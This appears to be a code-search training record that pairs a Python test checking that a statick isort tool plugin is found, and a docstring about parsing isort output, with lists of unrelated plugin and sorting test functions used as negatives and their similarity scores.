def test_isort_tool_plugin_found(): if sys.version_info.major == 3 and sys.version_info.minor < 6: pytest.skip("isort is only available for Python 3.6+, unable to test") manager = PluginManager() # Get the path to statick_tool/__init__.py, get the directory part, and # add 'plugins' to that to get the standard plugins dir manager.setPluginPlaces( [os.path.join(os.path.dirname(statick_tool.__file__), "plugins")] ) manager.setCategoriesFilter( { "Tool": ToolPlugin, } ) manager.collectPlugins() # Verify that a plugin's get_name() function returns "isort" assert any( plugin_info.plugin_object.get_name() == "isort" for plugin_info in manager.getPluginsOfCategory("Tool") ) # While we're at it, verify that a plugin is named Isort Tool Plugin assert any( plugin_info.name == "Isort Tool Plugin" for plugin_info in manager.getPluginsOfCategory("Tool") )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_plugins(self):\n from omtk import plugin_manager\n pm = plugin_manager.plugin_manager\n\n loaded_plugin_names = [plugin.cls.__name__ for plugin in pm.get_loaded_plugins_by_type('modules')]\n\n builtin_plugin_names = (\n 'Arm',\n 'FK',\n 'AdditiveFK',\n 'AvarGrpOnSurface',\n 'FaceBrow',\n 'FaceEyeLids',\n 'FaceEyes',\n 'FaceJaw',\n 'FaceLips',\n 'FaceNose',\n 'FaceSquint',\n 'Hand',\n 'Head',\n 'IK',\n 'InteractiveFK',\n 'Leg',\n 'LegQuad',\n 'Limb',\n 'Neck',\n 'Ribbon',\n 'SplineIK',\n 'Twistbone',\n )\n\n for plugin_name in builtin_plugin_names:\n self.assertIn(plugin_name, loaded_plugin_names)", "def test_plugins():\n assert plugins.template.plugin_test() == True\n assert plugin_test() == True", "def test(self, plugin):\n plug = plugin_source.load_plugin(plugin)\n plug.test()", "def test_plugin_initialize(self):\n p = PluginCustom()\n self.assertEqual('youpie', p.toto)", "def test_discoverable(self):\r\n plugins = getPlugins(IProcessor)\r\n lmath = [p for p in plugins if p.name == \"mlore\"]\r\n self.assertEqual(len(lmath), 1, \"Did not find math lore plugin: %r\" % (lmath,))", "def test_make_tool_plugin_found():\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces([os.path.join(os.path.dirname(statick_tool.__file__),\n 'plugins')])\n manager.setCategoriesFilter({\n \"Tool\": ToolPlugin,\n })\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"make\"\n assert any(plugin_info.plugin_object.get_name() == 'make' for\n plugin_info in manager.getPluginsOfCategory(\"Tool\"))\n # While we're at it, verify that a plugin is named Yamllint Tool Plugin\n assert any(plugin_info.name == 'Make Tool Plugin' for\n plugin_info in manager.getPluginsOfCategory(\"Tool\"))", "def test_register_dynamic_plugin(self):\n pass", "def test_rstlint_tool_plugin_found():\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n manager.setCategoriesFilter(\n {\n \"Tool\": ToolPlugin,\n }\n )\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"rstlint\"\n assert any(\n plugin_info.plugin_object.get_name() == \"rstlint\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )\n # While we're at it, verify that a plugin is named rstlint Tool Plugin\n assert any(\n plugin_info.name == \"rstlint Tool Plugin\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )", "def test_register_dynamic_plugin_manager(self):\n pass", "def test_exposeInterfaces(self):\n if self.plugin is None:\n return\n\n cs = settings.Settings()\n results = self.plugin.exposeInterfaces(cs)\n if results is None or not results:\n return\n\n # each plugin should return a list\n self.assertIsInstance(results, list)\n for result in results:\n # Make sure that all elements in the list satisfy the constraints of the\n # hookspec\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 3)\n\n order, interface, kwargs = result\n\n self.assertIsInstance(order, (int, float))\n self.assertTrue(issubclass(interface, interfaces.Interface))\n self.assertIsInstance(kwargs, dict)", "def test_isort(self):\n chdir(REPO_ROOT)\n cmd = [\"isort\", \"-df\", \"-rc\", \"-c\", *SRC_DIRS]\n print(\"running:\", \" \".join(str(part) for part in cmd))\n proc = run(cmd, capture_output=True)\n assert proc.returncode == 0, f\"isort issues:\\n{proc.stdout.decode('utf-8')}\"", "def load_plugin():\n return HostTestPluginCopyMethod_Shell()", "def test_isort_tool_plugin_parse_valid():\n itp = setup_isort_tool_plugin()\n total_output = []\n output = \"/tmp/x.py\"\n total_output.append(output)\n output = \"/tmp/y.py\"\n total_output.append(output)\n issues = itp.parse_output(total_output)\n assert len(issues) == 2\n assert issues[0].filename == \"/tmp/x.py\"\n assert issues[0].line_number == \"0\"\n assert issues[0].tool == \"isort\"\n assert issues[0].issue_type == \"formatting\"\n assert issues[0].severity == \"3\"\n assert issues[0].message == \"Imports are incorrectly sorted and/or formatted.\"\n assert issues[1].filename == \"/tmp/y.py\"", "def test_plugin_retrieval(self):\n plugin = ProjectAppPluginPoint.get_plugin(PLUGIN_NAME)\n self.assertIsNotNone(plugin)\n self.assertEqual(plugin.get_model().name, PLUGIN_NAME)\n self.assertEqual(plugin.name, PLUGIN_NAME)\n self.assertEqual(plugin.get_model().title, PLUGIN_TITLE)\n self.assertEqual(plugin.title, PLUGIN_TITLE)\n self.assertEqual(plugin.entry_point_url_id, PLUGIN_URL_ID)", "def test_register_dynamic_plugin_manager1(self):\n pass", "def test_register_dynamic_plugin1(self):\n pass", "def test_remote_plugin(self):\n plugin_name = 'Slack'\n Plugin.download_plugin(plugin_name)\n target = os.path.join(expanduser('~'), '.drupdates', 'plugins', plugin_name)\n plugins = Plugin.get_plugins()\n assert plugins[plugin_name]['info'][1] == os.path.join(target, '__init__.py')", "def test_get_plugin_by_id(self):\n response = self.client.get_plugin_by_id(1)\n self.assertEqual(response['id'], 1)", "def testSorting(self):\n if self.sorting in tools.SORTINGS:\n self.assertEqual(\n self.sorting,\n self.config.sorting\n )\n else:\n self.assertNotEqual(\n self.sorting,\n self.config.sorting\n )\n self.assertEqual(\n tools.SORTING_DEFAULT,\n self.config.sorting\n )", "def test_parrot_imported():\n assert \"parrot\" in sys.modules", "def test_custom_plugin(self):\n plugin_name = 'Druptest'\n source = os.path.join(self.current_dir, 'classes', plugin_name)\n target = os.path.join(expanduser('~'), '.drupdates', 'plugins', plugin_name)\n shutil.copytree(source, target)\n plugins = Plugin.get_plugins()\n assert plugins[plugin_name]['name'] == plugin_name", "def test_get_plugins_with_search_args(self):\n response = self.client.get_plugins({'name_exact': \"pl-dircopy\"})\n self.assertEqual(response['data'][0]['name'], \"pl-dircopy\")", "def sorter(Plugin):\n return Plugin.order", "def get_plugin_interface(self):", "def test_plugin_initialize_from_args(self):\n sys.argv.append('-t')\n p = PluginCustom()\n self.assertEqual('yourah', p.toto)", "def test_plugin_slowinit(node_factory):\n n = node_factory.get_node()\n\n n.rpc.plugin_start(os.path.join(os.getcwd(), \"tests/plugins/slow_init.py\"))\n\n # It's not actually configured yet, see what happens;\n # make sure 'rescan' and 'list' controls dont crash\n n.rpc.plugin_rescan()\n n.rpc.plugin_list()", "def test_install_plugin_again_is_ok(self):\n raise NotImplementedError()", "def setup_isort_tool_plugin(custom_rsc_path=None):\n arg_parser = argparse.ArgumentParser()\n\n if custom_rsc_path is not None:\n resources = Resources([custom_rsc_path])\n else:\n resources = Resources(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n config = Config(resources.get_file(\"config.yaml\"))\n plugin_context = PluginContext(arg_parser.parse_args([]), resources, config)\n plugin_context.args.output_directory = os.path.dirname(__file__)\n itp = IsortToolPlugin()\n itp.set_plugin_context(plugin_context)\n return itp", "def test_plugin_urls(self):\n plugin = ProjectAppPluginPoint.get_plugin(PLUGIN_NAME)\n self.assertEqual(plugin.urls, urlpatterns)", "def isort(context):\n exec_cmd = \"isort . --check --diff\"\n run_cmd(context, exec_cmd)", "def test_installed(self):\n check_output('unity --help', shell=True)", "def test_specific_plugin_installed(self):\n self._add_plugin(self.jigconfig, 'plugin01')\n set_jigconfig(self.gitrepodir, config=self.jigconfig)\n\n # Create staged\n self.commit(self.gitrepodir, 'a.txt', 'a')\n self.stage(self.gitrepodir, 'b.txt', 'b')\n\n with nested(\n patch('jig.runner.sys'),\n self.assertRaises(SystemExit)\n ) as (r_sys, ec):\n # Raise the error to halt execution like the real sys.exit would\n r_sys.exit.side_effect = SystemExit\n\n self.run_command('--plugin plugin01 {0}'.format(self.gitrepodir))\n\n self.assertResults(u\"\"\"\n ▾ plugin01\n\n ⚠ line 1: b.txt\n b is +\n\n {0} Jig ran 1 plugin\n Info 0 Warn 1 Stop 0\n \"\"\".format(ATTENTION), self.output)", "def test_commands_initialization(bot):\n plugin = Commands(bot)\n assert isinstance(plugin, Commands)\n assert plugin.bot == bot", "def test_filter_installed_plugins(plugin_dialog):\n plugin_dialog.filter(\"\")\n assert plugin_dialog.installed_list._count_visible() >= 0\n\n plugin_dialog.filter(\"no-match@123\")\n assert plugin_dialog.installed_list._count_visible() == 0", "def test_implements_IHelper(self):\n self.assertTrue(IHelper.providedBy(PersistenceHelper()))", "def test_fabsim():\n assert(\"plugins\" in get_plugin_path(\"FabDummy\"))\n assert(\"FabDummy\" in get_plugin_path(\"FabDummy\"))\n assert(len(get_fabsim_git_hash()) > 0)", "def test_sort(self):\n sort_field = MoveSearchForm.sort\n for value, label in sort_field.kwargs['choices']:\n response = self.do_search(id=u'1', sort=value)\n self.assert_(\n response.tmpl_context.results,\n \"\"\"Sort by {0} doesn't crash\"\"\".format(value)\n )", "def isort(command, checkonly=False):\n print(\n \"\"\"\nRunning isort the Python code import sorter\n===========================================\n\"\"\"\n )\n cmd = \"isort --check-only --diff .\" if checkonly else \"isort .\"\n command.run(cmd, echo=True, pty=POSIX)", "def test_insertSort(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_1[0]),self.test_1[1])", "def test_isort_tool_plugin_scan_oserror(mock_subprocess_check_output):\n mock_subprocess_check_output.side_effect = OSError(\"mocked error\")\n itp = setup_isort_tool_plugin()\n package = Package(\n \"valid_package\", os.path.join(os.path.dirname(__file__), \"valid_package\")\n )\n package[\"python_src\"] = [\n os.path.join(os.path.dirname(__file__), \"valid_package\", \"sample.py\")\n ]\n issues = itp.scan(package, \"level\")\n assert not issues", "def test_insertSort3(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_3[0]),self.test_3[1])", "def test_plugin_with_no_plugin_class(conf):\n # For fun, we pass in a system library\n installed_apps_before = conf.config[\"INSTALLED_APPS\"][:]\n cli.plugin(\"os.path\")\n assert installed_apps_before == conf.config[\"INSTALLED_APPS\"]", "def test_client_custom_plugin():\n client = ConfigureClients(plugins=[PluginVipCustomisation])\n assert client.plugins == [PluginVipCustomisation]", "def test_make_tool_plugin_scan_missing_tool_name():\n mtp = setup_make_tool_plugin()\n if not mtp.command_exists('make'):\n pytest.skip('Missing make executable.')\n package = Package('valid_package', os.path.join(os.path.dirname(__file__),\n 'valid_package'))\n issues = mtp.scan(package, 'level')\n assert not issues", "def test__SortOrder__name():\n for instance in SortOrder.INSTANCES.values():\n vampytest.assert_instance(instance.name, str)", "def test_create_plugin_instance(self):\n plugin_id = 2\n data = {\n 'title': 'Test plugin instance',\n 'dir': self.username + '/'\n }\n response = self.client.create_plugin_instance(plugin_id, data)\n self.assertEqual(response['title'], data['title'])", "def test_module(self):\n pass", "def test_get_sort_info(self):\n ars = self.ar[2009][11]['day']\n self.assertEqual(ars.get_sort_info(), (31, 'key', True))", "def test_xchemOT_imported():\n assert \"xchemOT\" in sys.modules", "def check_plugin(vcf_reader, plugin):\n # Always use core plug-in\n plugins = ['core']\n # Collect supplied plugin(s)\n [plugins.append(item) for item in plugin]\n # Create set\n plugins = list(set(plugins))\n # Evaluate vcf and plugin compatibility\n for plugin in plugins:\n\n if plugin == \"core\":\n from pScout.plugin.plugin_reader import core\n ret = core(vcf_reader, \"pScout/plugin/get_core.ini\")\n\n if ret is 1: # Not compatible\n exit()\n\n return plugins", "def setUp(self):\n self._plugin = spotlight_volume.SpotlightVolumePlugin()\n self._parser = plist.PlistParser()", "def request_plugins(self):", "def scan_plugin(self):\n pluginpath=_module_path()\n plugins=[]\n for f in os.listdir(pluginpath):\n if os.path.isfile(os.path.join(pluginpath,f)) and os.path.splitext(os.path.join(pluginpath,f))[-1]=='.py' :\n if 'plugin_' in os.path.basename(f):\n logger.debug(\"found plugin : %s\",f)\n plugins.append(f)\n return plugins", "def test_filter_available_plugins(plugin_dialog):\n plugin_dialog.filter(\"\")\n assert plugin_dialog.available_list.count() == 2\n assert plugin_dialog.available_list._count_visible() == 2\n\n plugin_dialog.filter(\"no-match@123\")\n assert plugin_dialog.available_list._count_visible() == 0\n\n plugin_dialog.filter(\"\")\n plugin_dialog.filter(\"test-name-0\")\n assert plugin_dialog.available_list._count_visible() == 1", "def test_dependencies_installed(self):\n installer = getattr(self.portal, 'portal_quickinstaller')\n self.assertTrue(installer.isProductInstalled('plone.app.dexterity'))", "def test_get_plugin_parameters(self):\n plugin_id = 2\n response = self.client.get_plugin_parameters(plugin_id,\n {'limit': 50, 'offset': 0})\n self.assertEqual(response['data'][0]['name'], \"dir\")", "def get_id(self):\n return \"unittest_required_plugin\"", "def test_addplugin(self):\n app = QApplication(sys.argv)\n data = (np.random.rand(30, 31, 32) * 100).astype(np.int)\n data[15:40, 13:20, 10:18] += 50\n se = seededitorqt.QTSeedEditor(data)\n wg0 = seededitorqt.plugin.SampleThresholdPlugin()\n se.addPlugin(wg0)\n # se.exec_()\n # self.assertTrue(False)", "def plugins():\n pass", "def main() -> bool:\n global logger\n logger = setup_logger(\"nitpycker\")\n plugin_manager = Manager()\n plugin_manager.load_plugins()\n args = parse_args(plugin_manager)\n if plugin_manager.enable_plugins(args.plugins, args):\n exit(2)\n\n plugin_manager.pre_test_discovery()\n tests = unittest.defaultTestLoader.discover(args.start_directory, pattern=args.pattern)\n plugin_manager.post_test_discovery()\n tests = plugin_manager.filter_tests(tests)\n report = ParallelRunner(plugin_manager, process_number=args.process_number, verbosity=args.verbosity).run(tests)\n return not report.wasSuccessful()", "def test_insertSort2(self):\n\t\tsortObj=insertSort()\n\t\tself.assertNotEqual(sortObj.run_sort(self.test_2[0]),self.test_2[1])", "def test_plot_ay_imported():\n assert \"plot_ay\" in sys.modules", "def test_load(self):\n (spec, check) = bundylogging.load()\n # It returns the checking function\n self.assertEqual(check, bundylogging.check)\n # The plugin stores it's spec\n self.assertEqual(spec, bundylogging.spec)", "def plugin_import(plugin):\n\n return importlib.import_module(plugin, package=\"directord\")", "def test_first_run(dbbackup, plugin, update, version_file=None, orig_version=None):\n\n if version_file:\n os.unlink(version_file)\n\n cli.initialize()\n update.assert_called_once()\n dbbackup.assert_not_called()\n\n # Check that it got called for each default plugin\n from kolibri.core.settings import DEFAULT_PLUGINS\n\n assert plugin.call_count == len(DEFAULT_PLUGINS)", "def test_plugin_command(node_factory):\n n = node_factory.get_node()\n\n # Make sure that the 'hello' command from the helloworld.py plugin\n # is not available.\n cmd = [hlp for hlp in n.rpc.help()[\"help\"] if \"hello\" in hlp[\"command\"]]\n assert(len(cmd) == 0)\n\n # Add the 'contrib/plugins' test dir\n n.rpc.plugin_startdir(directory=os.path.join(os.getcwd(), \"contrib/plugins\"))\n # Make sure that the 'hello' command from the helloworld.py plugin\n # is now available.\n cmd = [hlp for hlp in n.rpc.help()[\"help\"] if \"hello\" in hlp[\"command\"]]\n assert(len(cmd) == 1)\n\n # Make sure 'rescan' and 'list' subcommands dont crash\n n.rpc.plugin_rescan()\n n.rpc.plugin_list()\n\n # Make sure the plugin behaves normally after stop and restart\n assert(\"Successfully stopped helloworld.py.\" == n.rpc.plugin_stop(plugin=\"helloworld.py\")[''])\n n.daemon.wait_for_log(r\"Killing plugin: helloworld.py\")\n n.rpc.plugin_start(plugin=os.path.join(os.getcwd(), \"contrib/plugins/helloworld.py\"))\n n.daemon.wait_for_log(r\"Plugin helloworld.py initialized\")\n assert(\"Hello world\" == n.rpc.call(method=\"hello\"))\n\n # Now stop the helloworld plugin\n assert(\"Successfully stopped helloworld.py.\" == n.rpc.plugin_stop(plugin=\"helloworld.py\")[''])\n n.daemon.wait_for_log(r\"Killing plugin: helloworld.py\")\n # Make sure that the 'hello' command from the helloworld.py plugin\n # is not available anymore.\n cmd = [hlp for hlp in n.rpc.help()[\"help\"] if \"hello\" in hlp[\"command\"]]\n assert(len(cmd) == 0)\n\n # Test that we cannot start a plugin with 'dynamic' set to False in\n # getmanifest\n with pytest.raises(RpcError, match=r\"Not a dynamic plugin\"):\n n.rpc.plugin_start(plugin=os.path.join(os.getcwd(), \"tests/plugins/static.py\"))\n\n # Test that we cannot stop a started plugin with 'dynamic' flag set to\n # False\n n2 = node_factory.get_node(options={\n \"plugin\": os.path.join(os.getcwd(), \"tests/plugins/static.py\")\n })\n with pytest.raises(RpcError, match=r\"static.py cannot be managed when lightningd is up\"):\n n2.rpc.plugin_stop(plugin=\"static.py\")\n\n # Test that we don't crash when starting a broken plugin\n with pytest.raises(RpcError, match=r\"Timed out while waiting for plugin response\"):\n n2.rpc.plugin_start(plugin=os.path.join(os.getcwd(), \"tests/plugins/broken.py\"))", "def test_package(self):\n pass", "def register_plugin(self):\n self.edit_goto.connect(self.main.editor.load)\n self.redirect_stdio.connect(self.main.redirect_internalshell_stdio)\n self.main.add_dockwidget(self)\n\n unittesting_act = create_action(self, _(\"Run unit tests\"),\n icon=get_icon('profiler.png'),\n triggered=self.run_unittesting)\n unittesting_act.setEnabled(is_unittesting_installed())\n fixed_shortcut(\"Ctrl+Shift+F11\", self.main,\n self.run_unittesting)\n\n self.main.run_menu_actions += [unittesting_act]\n self.main.editor.pythonfile_dependent_actions += [unittesting_act]", "def describe(self, plugin):\n plug = plugin_source.load_plugin(plugin)\n plug.describe()", "def test_version_sorting(self):\n assert natsort(['1', '5', '10', '50']) == ['1', '5', '10', '50']", "def test(self):\n test_dir = join_path(self.test_suite.current_test_cache_dir, self.test_src_dir)\n self.run_test(\n \"sh\",\n [\"testshortsort.sh\"],\n expected=\"Alignments sorted by coordinate.\",\n purpose=\"test: checking alignments\",\n work_dir=test_dir,\n )", "def test_makeplugin(subprocess):\n # type: (Mock) -> None\n plugin = lektor_make.MakePlugin(lambda: None, None) # pragma: no branch\n plugin.on_before_build_all(lambda: None) # pragma: no branch\n subprocess.Popen.assert_called_with([\"make\", \"lektor\"])\n subprocess.Popen().wait.asset_called()", "def test_install_terraform_plugin_1(monkeypatch):\n monkeypatch.setattr(os, 'listdir', lambda path: [\n 'terraform-provider-terraform_v0.11.2_x4'])\n monkeypatch.setattr(os, 'remove', lambda path: True)\n monkeypatch.setattr(os, 'chmod', lambda path, permissions: True)\n\n monkeypatch.setattr(shutil, 'copy2', lambda src, dest: True)\n\n def mp_check_output(cmd):\n if cmd == ['which', 'terraform']:\n return b'/usr/local/bin/terraform\\n'\n\n if cmd == ['terraform', '-v']:\n return b'Terraform v0.11.3\\n\\n'\n\n raise Exception('Unmocked command: %s' % cmd)\n\n monkeypatch.setattr(subprocess, 'check_output', mp_check_output)\n\n install_terraform_plugin('/tmp/stone-burner_plugins')", "def __test__():\n#-------------------------------------------------------------------------------\n import pylib.tester as tester\n return 0", "def test_install(self):\n pass", "def test_implements_IHelper(self):\n self.assertTrue(IHelper.providedBy(WorkerHelper()))", "def test_vendored_libjuju(self):\n for name in sys.modules:\n if name.startswith(\"juju\"):\n module = sys.modules[name]\n if getattr(module, \"__file__\"):\n print(getattr(module, \"__file__\"))\n assert re.search('n2vc', module.__file__, re.IGNORECASE)\n\n # assert module.__file__.find(\"N2VC\")\n # assert False\n return", "def test_specific_plugin_not_installed(self):\n self._add_plugin(self.jigconfig, 'plugin01')\n set_jigconfig(self.gitrepodir, config=self.jigconfig)\n\n # Create staged\n self.commit(self.gitrepodir, 'a.txt', 'a')\n self.stage(self.gitrepodir, 'b.txt', 'b')\n\n with nested(\n patch('jig.runner.sys'),\n self.assertRaises(SystemExit)\n ) as (r_sys, ec):\n # Raise the error to halt execution like the real sys.exit would\n r_sys.exit.side_effect = SystemExit\n\n self.run_command(\n '--plugin notinstalled {0}'.format(self.gitrepodir))\n\n # A plugin which is not installed was requested so not output\n self.assertEqual('', self.output)", "def test_molssi_project_imported():\n assert \"molssi_project\" in sys.modules", "def test_provider(self):\n msg = 'Wrong number of processing algorithm loaded.'\n self.assertEqual(len(self.provider.alglist), 6, msg)\n\n msg = 'InaSAFE should be activated by default in Processing.'\n self.assertEqual(self.provider.activate, True, msg)\n\n msg = 'Wrong processing provide.'\n for algorithm in self.provider.alglist:\n self.assertEqual(algorithm.provider, self.provider, msg)", "def test_import(self):\n self.assertTrue(NagiosPerfdataCollector)", "def test(self):\n\t\treturn describeInterface(self)", "def get_plugin(self, name):", "def test_setup_object(self):\n self._test_object.__name__ = 'pluggable_object'\n self._test_object.test_plugin = object()\n self._test_object.__all__ = ['test_plugin']\n pluggable_package.setup(self._test_object)\n self._test_setup(self._test_object)", "def test():\n try:\n import nipype\n except ImportError:\n # if nipype is not installed, skip this test (without failure)\n return True\n suite = unittest.TestLoader().loadTestsFromTestCase(TestNipypeWrap)\n runtime = unittest.TextTestRunner(verbosity=2).run(suite)\n return runtime.wasSuccessful()", "def test_get_plugin_id(self):\n plugin_name = 'myfakeplugin'\n self.my_plugin.name = plugin_name\n\n def side_effect(name):\n if name == plugin_name:\n return self.my_plugin\n else:\n raise sahara_base.APIException(error_code=404,\n error_name='NOT_FOUND')\n\n self.sahara_client.plugins.get.side_effect = side_effect\n self.assertIsNone(self.sahara_plugin.get_plugin_id(plugin_name))\n self.assertRaises(exception.EntityNotFound,\n self.sahara_plugin.get_plugin_id, 'noplugin')\n\n calls = [mock.call(plugin_name), mock.call('noplugin')]\n self.sahara_client.plugins.get.assert_has_calls(calls)", "def test_molecool_imported():\n assert \"molecool\" in sys.modules", "def test_check_module(self) -> None:\n check_module(\"os\")", "def init_plugins(group):\n package = sys.modules[__name__]\n\n for (importer, module_name, ispkg) in pkgutil.iter_modules(package.__path__):\n if not ispkg:\n try:\n module = importlib.import_module(package.__name__ + '.' + module_name)\n\n if 'run' not in module.__dict__:\n print_fail('Plugin command \"%s\" doesn\\'t provide a \"run\" method. Aborting.' % (module_name))\n # sys.exit(-1)\n else:\n group.add_command(module.run)\n except Exception, e:\n print_fail('[%s] %s' % (module_name, str(e) + str(type(e))))", "def test_qm_project_python_testing_imported():\n assert \"qm_project_python_testing\" in sys.modules", "def test_setup_module(self):\n pluggable_package.setup(self._test_module)\n self._test_setup(self._test_module)", "def test_is_installed():\n assert _is_installed('coverage') is True # regular dependency\n assert _is_installed('pytest') is True # dev dependency\n assert _is_installed('missing') is False # missing dependency", "def test_list_vips_sort(self):\r\n resources = \"vips\"\r\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\r\n self._test_list_resources(resources, cmd,\r\n sort_key=[\"name\", \"id\"],\r\n sort_dir=[\"asc\", \"desc\"])", "def test_list_vips_sort(self):\n resources = \"vips\"\n cmd = vip.ListVip(test_cli20.MyApp(sys.stdout), None)\n self._test_list_resources(resources, cmd,\n sort_key=[\"name\", \"id\"],\n sort_dir=[\"asc\", \"desc\"])", "def test_override_plugin(self):\n plugin_name = 'Stdout'\n source = os.path.join(self.current_dir, 'classes', plugin_name)\n target = os.path.join(expanduser('~'), '.drupdates', 'plugins', plugin_name)\n shutil.copytree(source, target)\n plugins = Plugin.get_plugins()\n assert plugins[plugin_name]['info'][1] == os.path.join(target, '__init__.py')", "def test_basic(self):\n plugin_instance = ProbabilitiesFromPercentiles2D(self.test_cube,\n self.new_name)\n self.assertEqual(plugin_instance.output_name, self.new_name)", "def find_plugins():\n return list(straight.plugin.load('csbot.plugins', subclasses=Plugin))", "def test04_vms_page_table_sorting(self):\n self.lg('%s STARTED' % self._testID)\n self.lg('sorting of all fields of vms table, should be working as expected')\n self.assertTrue(self.Tables.check_sorting_table('machines'))\n self.lg('%s ENDED' % self._testID)", "def testFindsBuiltins(self):\r\n self.assertEqual('sys', modulefinder.get_module_filename('sys'))\r\n self.assertEqual('time', modulefinder.get_module_filename('time'))", "def test_subworkflows_info_in_modules_repo(self):\n self.subworkflow_install.install(\"bam_sort_stats_samtools\")\n mods_info = nf_core.subworkflows.SubworkflowInfo(self.nfcore_modules, \"bam_sort_stats_samtools\")\n mods_info.local = True\n mods_info_output = mods_info.get_component_info()\n console = Console(record=True)\n console.print(mods_info_output)\n output = console.export_text()\n\n assert \"Subworkflow: bam_sort_stats_samtools\" in output\n assert \"Inputs\" in output\n assert \"Outputs\" in output" ]
[ "0.66552377", "0.6554768", "0.6273206", "0.62442213", "0.6233943", "0.62220126", "0.60991585", "0.60933506", "0.6089562", "0.5941484", "0.59386533", "0.59242934", "0.5922501", "0.58955973", "0.58816534", "0.58793914", "0.58021533", "0.57796365", "0.57335883", "0.57034636", "0.56641763", "0.56267726", "0.5626531", "0.5626476", "0.562094", "0.55849403", "0.55421877", "0.55373126", "0.5537275", "0.55300945", "0.54858345", "0.54711425", "0.5449824", "0.5421194", "0.5415871", "0.54118866", "0.53819555", "0.5372896", "0.53721166", "0.5370303", "0.53627163", "0.53525406", "0.53428423", "0.5314355", "0.5303815", "0.5278685", "0.52722687", "0.52445924", "0.524252", "0.5241138", "0.5223414", "0.52162147", "0.5211605", "0.51974773", "0.5193686", "0.5191873", "0.5178825", "0.5168631", "0.51649034", "0.5159231", "0.5142129", "0.5121735", "0.5120854", "0.5117453", "0.5113593", "0.51125705", "0.5103859", "0.5095118", "0.509428", "0.5088653", "0.50864583", "0.50860876", "0.5083254", "0.50597394", "0.5058254", "0.50575495", "0.5048846", "0.50344324", "0.5024982", "0.50220346", "0.50131774", "0.50077593", "0.50073266", "0.5005986", "0.498579", "0.49638948", "0.49625003", "0.49559405", "0.4952109", "0.49473405", "0.49443263", "0.49435154", "0.4943438", "0.4936548", "0.49338928", "0.49333632", "0.49261236", "0.49178475", "0.49171644", "0.49166042" ]
0.8355158
0
Verify that we can parse the normal output of isort.
def test_isort_tool_plugin_parse_valid(): itp = setup_isort_tool_plugin() total_output = [] output = "/tmp/x.py" total_output.append(output) output = "/tmp/y.py" total_output.append(output) issues = itp.parse_output(total_output) assert len(issues) == 2 assert issues[0].filename == "/tmp/x.py" assert issues[0].line_number == "0" assert issues[0].tool == "isort" assert issues[0].issue_type == "formatting" assert issues[0].severity == "3" assert issues[0].message == "Imports are incorrectly sorted and/or formatted." assert issues[1].filename == "/tmp/y.py"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_isort(self):\n chdir(REPO_ROOT)\n cmd = [\"isort\", \"-df\", \"-rc\", \"-c\", *SRC_DIRS]\n print(\"running:\", \" \".join(str(part) for part in cmd))\n proc = run(cmd, capture_output=True)\n assert proc.returncode == 0, f\"isort issues:\\n{proc.stdout.decode('utf-8')}\"", "def isort(context):\n exec_cmd = \"isort . --check --diff\"\n run_cmd(context, exec_cmd)", "def isort_check(ctx):\n ctx.run(f\"{VENV_PREFIX} isort --atomic --check-only .\")", "def test_shell(self):\n integers = shell_sort(self.actual)\n self.assertEqual(self.expected, integers)", "def isort(command, checkonly=False):\n print(\n \"\"\"\nRunning isort the Python code import sorter\n===========================================\n\"\"\"\n )\n cmd = \"isort --check-only --diff .\" if checkonly else \"isort .\"\n command.run(cmd, echo=True, pty=POSIX)", "def test_optimize_parse():\n assert True", "def test_python_3_compatibility(self):\n assert natsort(['1', 'a']) == ['1', 'a']", "def test_parse(self): \n\n results = self.parser.parse()\n self.assertEqual(results, test_case_data['parse_output'])", "def test_version_sorting(self):\n assert natsort(['1', '5', '10', '50']) == ['1', '5', '10', '50']", "def test(self):\n test_dir = join_path(self.test_suite.current_test_cache_dir, self.test_src_dir)\n self.run_test(\n \"sh\",\n [\"testshortsort.sh\"],\n expected=\"Alignments sorted by coordinate.\",\n purpose=\"test: checking alignments\",\n work_dir=test_dir,\n )", "def test_sort_strings(self):\n chdir(REPO_ROOT)\n cmd = [\"python\", \"scripts/sort_strings.py\", \"--check\"]\n print(\"running:\", \" \".join(str(part) for part in cmd))\n proc = run(cmd, capture_output=True)\n assert proc.returncode == 0, (\n f\"sort strings issues:\\n{proc.stdout.decode('utf-8')}\\n\\n\"\n \"Please run ./scripts/sort_string.py to resolve this issue.\"\n )", "def test_rust_code_analysis_tokei_Rust() -> None:\n\n ret_value = compare(\n \"rust-code-analysis\",\n \"tokei\",\n [\"-g\", \"-f\"],\n [\"SLOC\", \"PLOC\", \"CLOC\", \"BLANK\"],\n \"Rust\",\n \"bubble_sort.rs\",\n )\n\n assert ret_value == 0", "def test_isort_tool_plugin_found():\n if sys.version_info.major == 3 and sys.version_info.minor < 6:\n pytest.skip(\"isort is only available for Python 3.6+, unable to test\")\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n manager.setCategoriesFilter(\n {\n \"Tool\": ToolPlugin,\n }\n )\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"isort\"\n assert any(\n plugin_info.plugin_object.get_name() == \"isort\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )\n # While we're at it, verify that a plugin is named Isort Tool Plugin\n assert any(\n plugin_info.name == \"Isort Tool Plugin\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )", "def test_compare(self):\n parser = parse_args(['-g', '10', '-s', 